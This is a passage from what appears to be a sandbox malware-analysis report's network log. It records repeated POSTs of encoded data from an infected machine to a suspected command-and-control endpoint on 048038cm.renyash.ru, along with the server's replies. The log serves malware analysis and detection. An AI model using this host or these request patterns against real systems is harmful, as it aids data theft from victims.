                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBEop6p0EeLujw1INkP2fsvK%2BvD9iEr2wRERsGGUzc%2FkWxP8x3J44MF2SMVZzj1SW4aOZgPOXMFxJuHP2HEocHU5Pp7Ekc1fqZvPNw5iS3LPNkgRTa5w6g5KCYl0duHlPgGbCqbx"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b07cae06a56-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3943&min_rtt=1694&rtt_var=5134&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=74145&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        50192.168.2.449922104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:06.994298935 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:07.344861031 CET2584OUTData Raw: 56 5b 59 52 56 43 50 5c 5d 5f 52 56 5a 5b 58 58 57 5a 5f 5a 54 52 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[YRVCP\]_RVZ[XXWZ_ZTRUFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX')<6 ^75 X/83]7>=*, 9?* ._;60 (<%\ ![(+
                                                                        Dec 28, 2024 20:44:08.084136009 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:08.327881098 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fnknY20REX3V6hy1YXCENhLjHEHYx8WDnx8r4%2F59m6GROi8ie4ENRVTOh%2FZIg2ottCpQgenAEEm4CjCzQ0nujOmSs8bQqiXTrhqR7rK4scdDY8Q3fJCwG8Wq21qGkG%2Bu79AQSSmU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b119ce0de9a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4530&min_rtt=1490&rtt_var=6640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=56554&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        51192.168.2.449925104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:08.576657057 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:08.923166037 CET2584OUTData Raw: 53 55 59 54 53 42 50 5e 5d 5f 52 56 5a 5b 58 54 57 5e 5f 59 54 5d 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SUYTSBP^]_RVZ[XTW^_YT]UBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z?!\ +(_ S4/84!.2Y*=##9V)<;:460>%\ ![(+
                                                                        Dec 28, 2024 20:44:09.707803011 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:10.006495953 CET803INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z3C4OToaIQKaEkbgLT%2F9xJSIngW4yVhQbCWXYEitM9dMpUQg3ZX4dwGCge5w5wBZyjxGxTV6Ht6b6AzZd1mxSC5i2A3eTwxEjzm0GkduNbzbZZu0Y8IlHCd4Z9RjB97D%2FF3LO9ub"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b1bbb8541e6-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2924&min_rtt=1681&rtt_var=3118&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=125515&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        52192.168.2.449930104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:10.243397951 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:10.594959021 CET2584OUTData Raw: 53 52 5c 51 56 47 50 5a 5d 5f 52 56 5a 50 58 59 57 5f 5f 50 54 50 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SR\QVGPZ]_RVZPXYW__PTPUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'<-Z"/ S?; 4.X>=("9+>;X9! =,%\ ![(
                                                                        Dec 28, 2024 20:44:11.328167915 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:11.569171906 CET802INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D6xElAsqAqEaNYggwoNc0EYCOqAPzTIuBnIUTmKONSPz%2Bxx1JwQlumdRwx7izTQQ%2BsR4bjpxvostV3bU5AWXqPILEDPrOqXHD8xAecSl8QYCDbJ59nWOMEUNF2ZIlWS4sjXsxSIz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b25d9847287-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3784&min_rtt=1956&rtt_var=4391&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=88026&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        53192.168.2.449936104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:11.805520058 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:12.157326937 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:12.157403946 CET2584OUTData Raw: 56 56 59 51 53 46 50 52 5d 5f 52 56 5a 59 58 5a 57 50 5f 51 54 56 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VVYQSFPR]_RVZYXZWP_QTVUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_+?9\! [758Z88?#._>'P70>3:Z!0,=<%\ ![(#
                                                                        Dec 28, 2024 20:44:13.284667015 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:13.520597935 CET803INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GZDerwNgjPotjl9AcFXmGuu4eFB3YAVln1aCg8Vtm1kDl%2FSD1CYSoXQ0ylelr1mMOsd0pUq1MjKrRcvEEnVIb8r4zkqv%2BQg9MsjlXP1Y3BYMQRPRGklPYYGKgWC0915rbgF8NTcm"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b321caac413-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2979&min_rtt=1574&rtt_var=3401&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=113902&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        54192.168.2.449941104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:13.757625103 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:14.110605955 CET2584OUTData Raw: 56 54 5c 54 53 41 55 5b 5d 5f 52 56 5a 5c 58 54 57 5c 5f 5f 54 56 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VT\TSAU[]_RVZ\XTW\__TVUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+)6 #&8[-;#4>!>-T49?T(,/Z9?]!00><%\ ![(7
                                                                        Dec 28, 2024 20:44:14.889739990 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:15.131808043 CET809INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2vMyTMBsXQD6oZO0RoPI5%2Fm630%2B1DD92WcyV3LDB5%2BhpRm98NW9M8En3M92a41TA4zRS6Exb8oq93nnymHnpH04xBh0kgw22HK7apn2J0E5H%2Fa0NsZA3h2nWfP33E8F%2B8PgE08E"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b3c0a2e6a56-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3502&min_rtt=2345&rtt_var=3194&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=125818&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        55192.168.2.449944104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:15.369741917 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:15.719861984 CET2584OUTData Raw: 56 50 59 56 56 43 50 5a 5d 5f 52 56 5a 5f 58 59 57 5d 5f 50 54 5c 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYVVCPZ]_RVZ_XYW]_PT\UHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y([!8X"68,+7X&*./#*#W(/?^:'[# $(,%\ ![(
                                                                        Dec 28, 2024 20:44:16.651869059 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:16.896053076 CET800INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRuPW5I4zbN2Q1y58wbeHFEJgHP6xdFv%2FmCFKOvvepcf2wU9Cg5Zr10D1aVafuqxdhw6CZk96thyJGJQftsT9Le8gSft15lcDoG56YbEaSw1SkVJQzB3SQopCLSP8XeprDY3a8SH"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b471ad03300-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4608&min_rtt=2092&rtt_var=5817&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=65700&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        56192.168.2.449949104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:17.133306026 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2576
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:17.485553026 CET2576OUTData Raw: 53 56 5c 54 56 44 55 58 5d 5f 52 56 5a 58 58 5c 57 51 5f 50 54 51 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SV\TVDUX]_RVZXX\WQ_PTQUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^(,%_5+<45<X884#X:*.;P":?U>?:_ !;^=<%\ ![(
                                                                        Dec 28, 2024 20:44:17.532318115 CET1236OUTData Raw: 05 05 27 1a 0e 2c 14 06 3b 5c 10 51 31 01 06 2d 21 03 06 15 38 30 06 33 30 35 21 00 3a 31 26 25 0e 28 54 2d 38 3f 32 28 38 23 14 06 32 07 22 22 27 31 47 20 09 15 22 27 0c 04 01 55 3a 01 04 2f 07 09 3b 1e 0c 23 37 0d 01 04 5f 1c 3d 28 2b 2f 37 37
                                                                        Data Ascii: ',;\Q1-!80305!:1&%(T-8?2(8#2""'1G "'U:/;#7_=(+/77>/0S21+?;;1>^&83;""(=<()":X!9X>!>78?P4;9',%41>58=>=8*;80&_2#_\52>"54+G./,#3=$7]P5=Y4)>#_0\$U:*3?+*)".R;/,Y
                                                                        Dec 28, 2024 20:44:18.767355919 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:19.015718937 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UpoVT6Mo%2BGLgDmYu5370WnjJEhYctKm45o0U1wWBKuXRSofFsbbVb6zNATaXpwoMHEgzD6VpGvvrVm1K%2Bi4GlclJkRkFmNRBI05SbX%2FJHgsAxfSUuBbGt3oBOob62bkidva66TUy"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b544eaa422d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4587&min_rtt=1790&rtt_var=6266&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2882&delivery_rate=60407&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        57192.168.2.449955104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:19.271469116 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:19.626149893 CET2584OUTData Raw: 56 50 59 56 53 44 55 58 5d 5f 52 56 5a 5d 58 58 57 58 5f 5e 54 54 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPYVSDUX]_RVZ]XXWX_^TTUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$X)<-!];"%+,4=-*=/U 7=<3._<## *<%\ ![(3
                                                                        Dec 28, 2024 20:44:20.402528048 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:20.648243904 CET805INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a3HwaPOkA59XwzgRxQEVLUXXGMHekrSbJk17iR8MHa3945D%2FoCvfzdO3oy0n%2F6wGyacWbVV2PXV6wp00GDRqJu2KNRhGZIAoxrS%2FMJunQYYBxUmI0n3WZG3UroB0bclgSrQnEJVv"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b5e9872f793-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7704&min_rtt=1492&rtt_var=12984&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=28520&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        58192.168.2.449959104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:20.940783024 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:21.297993898 CET2584OUTData Raw: 56 5a 5c 55 56 48 55 5c 5d 5f 52 56 5a 5c 58 5f 57 5c 5f 50 54 50 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZ\UVHU\]_RVZ\X_W\_PTPUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y(/9\ ; ;-+7>"\>=34:7T*/9*86#/^*<%\ ![(7
                                                                        Dec 28, 2024 20:44:22.071388006 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:22.315793991 CET802INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=INjubFSU5rNX7HdRkugvzZj98DCndO2z3MIrjEt8bISb0PBfdMA7mRVCSIacTnJMNvyHvzU3WfKN%2FSw9AuvBJhFdPGfuvqlEotXxfCumTpvGqDHHMmShQCUU4nbvZYhzho2Zo%2ByW"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b690a704240-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4388&min_rtt=1657&rtt_var=6083&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=62114&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        59192.168.2.449963104.21.38.8480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:44:22.563133001 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
